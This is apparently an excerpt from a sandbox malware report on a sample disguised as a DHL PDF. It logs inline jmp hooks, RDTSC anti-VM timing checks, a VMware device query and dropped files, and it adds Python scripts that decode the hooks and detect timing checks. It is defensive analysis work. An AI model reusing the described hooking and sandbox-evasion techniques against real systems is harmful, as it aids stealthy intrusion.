          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6952 base: 77735050 value: E9 EB 61 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6952 base: 777350F0 value: E9 5B 61 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6952 base: 77735180 value: E9 9B 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6952 base: 77735190 value: E9 CB 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6952 base: 777351A0 value: E9 4B 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6952 base: 7774FEE0 value: E9 9B FF FF FF
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6952 base: 776E33C0 value: E9 FB 6F 00 00
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6952 base: 776E4760 value: E9 2B 6B 00 00
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6952 base: 776A6590 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6952 base: 776AB510 value: E9 2B 53 00 00
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6952 base: 776CC490 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6952 base: 776EEE00 value: E9 E1 52 00 00
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6952 base: 776EEFD0 value: E9 26 5B 00 00
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6964 base: 77735050 value: E9 EB 61 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6964 base: 777350F0 value: E9 5B 61 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6964 base: 77735180 value: E9 9B 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6964 base: 77735190 value: E9 CB 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6964 base: 777351A0 value: E9 4B 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6964 base: 7774FEE0 value: E9 9B FF FF FF
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6964 base: 776E33C0 value: E9 FB 6F 00 00
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6964 base: 776E4760 value: E9 2B 6B 00 00
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6964 base: 776A6590 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6964 base: 776AB510 value: E9 2B 53 00 00
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6964 base: 776CC490 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6964 base: 776EEE00 value: E9 E1 52 00 00
          Source: C:\Windows\SysWOW64\rundll32.exe :: Memory written: PID: 6964 base: 776EEFD0 value: E9 26 5B 00 00
          Source: C:\Windows\SysWOW64\cmd.exe :: Memory written: PID: 6964 base: 77735050 value: E9 EB 61 FB FF
          Source: C:\Windows\SysWOW64\cmd.exe :: Memory written: PID: 6964 base: 777350F0 value: E9 5B 61 FB FF
          Source: C:\Windows\SysWOW64\cmd.exe :: Memory written: PID: 6964 base: 77735180 value: E9 9B 60 FB FF
          Source: C:\Windows\SysWOW64\cmd.exe :: Memory written: PID: 6964 base: 77735190 value: E9 CB 60 FB FF
          Source: C:\Windows\SysWOW64\cmd.exe :: Memory written: PID: 6964 base: 777351A0 value: E9 4B 60 FB FF
          Source: C:\Windows\SysWOW64\cmd.exe :: Memory written: PID: 6964 base: 7774FEE0 value: E9 9B FF FF FF
          Source: C:\Windows\SysWOW64\cmd.exe :: Memory written: PID: 6964 base: 776E33C0 value: E9 FB 6F 00 00
          Source: C:\Windows\SysWOW64\cmd.exe :: Memory written: PID: 6964 base: 776E4760 value: E9 2B 6B 00 00
          Source: C:\Windows\SysWOW64\cmd.exe :: Memory written: PID: 6964 base: 776A6590 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\cmd.exe :: Memory written: PID: 6964 base: 776AB510 value: E9 2B 53 00 00
          Source: C:\Windows\SysWOW64\cmd.exe :: Memory written: PID: 6964 base: 776CC490 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\cmd.exe :: Memory written: PID: 6964 base: 776EEE00 value: E9 E1 52 00 00
          Source: C:\Windows\SysWOW64\cmd.exe :: Memory written: PID: 6964 base: 776EEFD0 value: E9 26 5B 00 00
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exe :: Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe :: Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe :: Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe :: Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe :: Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe :: Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
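Every "Memory written" value above is a 5-byte sequence starting with E9, the opcode of a 32-bit relative jump: the injected code replaces the first bytes of a function with `jmp rel32`, and the hook destination is the address of the byte after the 5-byte instruction plus the signed little-endian displacement. The following Python script is an added example (not part of the Joe Sandbox report) that decodes the 13 writes recorded for PID 6952, computes each jump target and groups the targets by 4 KiB page; the addresses and byte strings are copied from the report, while the page grouping, the direction/distance labels and the treatment of the PeekMessageA bytes as "not a jmp" are this example's own. No attempt is made to name the hooked functions, since the report does not resolve them.

```python
import struct
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Hook writes copied from the report for rundll32.exe, PID 6952 (the report
# lists the same 13 writes again for PID 6964). Each entry: (address, bytes).
OBSERVED_WRITES: List[Tuple[int, str]] = [
    (0x77735050, "E9 EB 61 FB FF"),
    (0x777350F0, "E9 5B 61 FB FF"),
    (0x77735180, "E9 9B 60 FB FF"),
    (0x77735190, "E9 CB 60 FB FF"),
    (0x777351A0, "E9 4B 60 FB FF"),
    (0x7774FEE0, "E9 9B FF FF FF"),
    (0x776E33C0, "E9 FB 6F 00 00"),
    (0x776E4760, "E9 2B 6B 00 00"),
    (0x776A6590, "E9 0B 00 00 00"),
    (0x776AB510, "E9 2B 53 00 00"),
    (0x776CC490, "E9 0B 00 00 00"),
    (0x776EEE00, "E9 E1 52 00 00"),
    (0x776EEFD0, "E9 26 5B 00 00"),
]

# The PeekMessageA patch reported for explorer.exe, in the report's "0x.." spelling.
# It is not an E9 jump; the decoder must say so instead of guessing a target.
PEEKMESSAGE_PATCH = "0x48 0x8B 0xB8 0x81 0x1E 0xE7"


def parse_bytes(raw: str) -> bytes:
    """Accept both spellings used in the report: 'E9 EB 61' and '0x48 0x8B'."""
    return bytes(int(tok, 16) for tok in raw.replace("0x", "").split())


def decode_jmp_rel32(base: int, raw: str) -> Optional[int]:
    """Absolute target of a 5-byte `jmp rel32` (E9 xx xx xx xx) written at `base`.

    x86 resolves rel32 against the address of the *next* instruction, so the
    target is base + 5 + rel32, with rel32 read little-endian and signed. The
    FB FF / FF FF high bytes in the report are negative displacements, i.e.
    jumps backwards to a lower address. Returns None for anything that is not
    an E9 jump.
    """
    code = parse_bytes(raw)
    if len(code) != 5 or code[0] != 0xE9:
        return None
    rel32 = struct.unpack("<i", code[1:5])[0]
    return (base + 5 + rel32) & 0xFFFFFFFF


def group_targets_by_page(writes: List[Tuple[int, str]],
                          page_size: int = 0x1000) -> Dict[int, List[Tuple[int, int]]]:
    """Map page base -> [(hook site, target)] for every decodable jump.

    Hooks installed by one injector tend to converge on one or two regions
    holding the handlers or trampolines, so the page that collects the most
    targets is the first place to dump. A target only a few bytes past its own
    site (rel32 = 0x0B here) stays inside the same function and is worth
    inspecting separately.
    """
    pages: Dict[int, List[Tuple[int, int]]] = defaultdict(list)
    for base, raw in writes:
        target = decode_jmp_rel32(base, raw)
        if target is not None:
            pages[target & ~(page_size - 1)].append((base, target))
    return dict(pages)


def hook_report(writes: List[Tuple[int, str]]) -> List[str]:
    """One line per write: direction, distance and resolved target."""
    lines = []
    for base, raw in writes:
        target = decode_jmp_rel32(base, raw)
        if target is None:
            lines.append(f"{base:08X}: not a jmp rel32 ({raw})")
        else:
            direction = "back" if target < base else "fwd"
            lines.append(f"{base:08X}: jmp {direction} {abs(target - base):#x} -> {target:08X}")
    return lines


if __name__ == "__main__":
    for line in hook_report(OBSERVED_WRITES + [(0x0, PEEKMESSAGE_PATCH)]):
        print(line)
    for page, hits in sorted(group_targets_by_page(OBSERVED_WRITES).items()):
        print(f"page {page:08X}: {len(hits)} hook(s) jump here")
```

Run against the report's data, six of the thirteen jumps land in the same page (0x776EB000), which is the usual signature of a single block of trampolines serving several patched prologues; in a live investigation that page, not the patched sites, is what to dump and disassemble.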

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\cmd.exe :: RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe :: RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe :: RDTSC instruction interceptor: First address: 00000000026098E4 second address: 00000000026098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe :: RDTSC instruction interceptor: First address: 0000000002609B4E second address: 0000000002609B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\cmd.exe :: Code function: 2_2_00409A80 rdtsc 2_2_00409A80
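The RDTSC entries above record two `rdtsc` reads six bytes apart with only an `xor`/`add` between them, which is the minimal timing check: the difference between the two time-stamp counter reads is compared with a threshold that a hypervisor exit or a single-stepping debugger inflates. As an added example that is not part of the report, the following Python scanner flags pairs of `0F 31` (rdtsc) opcodes lying within a short window of each other in a code buffer, which is the static counterpart of the sandbox's instruction interceptor. The buffer is constructed here from the report's mnemonics; the byte encodings chosen for `xor ecx, ecx` and `add ecx, eax` and the image base 0x4098DC are assumptions picked so the pair reproduces the report's first two addresses.

```python
from typing import List, Tuple

RDTSC = b"\x0f\x31"  # opcode of the rdtsc instruction

# Constructed buffer: the sequence reported for cmd.exe (rdtsc / xor ecx,ecx /
# add ecx,eax / rdtsc) surrounded by nop padding. The report gives mnemonics and
# 2-byte offsets, not bytes; the encodings used for xor and add are assumptions
# that match those offsets.
SAMPLE_CODE = (
    b"\x90" * 8
    + b"\x0f\x31"  # rdtsc          (offset 8)
    + b"\x31\xc9"  # xor ecx, ecx   (offset 10)
    + b"\x01\xc1"  # add ecx, eax   (offset 12)
    + b"\x0f\x31"  # rdtsc          (offset 14)
    + b"\x90" * 8
)

# Base chosen so the pair above lands at the report's 0x4098E4 / 0x4098EA
# (an assumption for the demonstration, not a value from the report).
SAMPLE_BASE = 0x4098DC


def rdtsc_offsets(code: bytes) -> List[int]:
    """Every offset at which the two-byte rdtsc opcode occurs.

    This is a raw byte scan, not a disassembly: 0F 31 can also appear inside an
    immediate or a displacement, so each hit is a candidate to confirm in a
    disassembler, not proof on its own.
    """
    hits, pos = [], code.find(RDTSC)
    while pos != -1:
        hits.append(pos)
        pos = code.find(RDTSC, pos + len(RDTSC))
    return hits


def find_rdtsc_pairs(code: bytes, window: int = 32) -> List[Tuple[int, int]]:
    """Offsets of consecutive rdtsc reads no more than `window` bytes apart.

    A lone rdtsc is common in benign timing code; two reads with only a few
    instructions between them is the VM/debugger check, because the delta is
    then dominated by trap overhead rather than by the code in between.
    """
    hits = rdtsc_offsets(code)
    return [(a, b) for a, b in zip(hits, hits[1:]) if b - a <= window]


def describe_pairs(code: bytes, base: int = 0, window: int = 32) -> List[str]:
    """Render the pairs in the report's wording so they compare directly."""
    return [
        f"First address: {base + a:016X} second address: {base + b:016X} "
        f"gap: {b - a} bytes"
        for a, b in find_rdtsc_pairs(code, window)
    ]


if __name__ == "__main__":
    for line in describe_pairs(SAMPLE_CODE, SAMPLE_BASE):
        print(line)
```

The window is deliberately small: the report's pairs are six bytes apart, and real timing checks rarely put more than a handful of instructions between the two reads, so a 32-byte window keeps the false-positive rate from stray 0F 31 byte pairs manageable while still catching the pattern in a hollowed process image.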
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pntables\cvtres.exe
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pntables\AvVsPkDH.dll
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe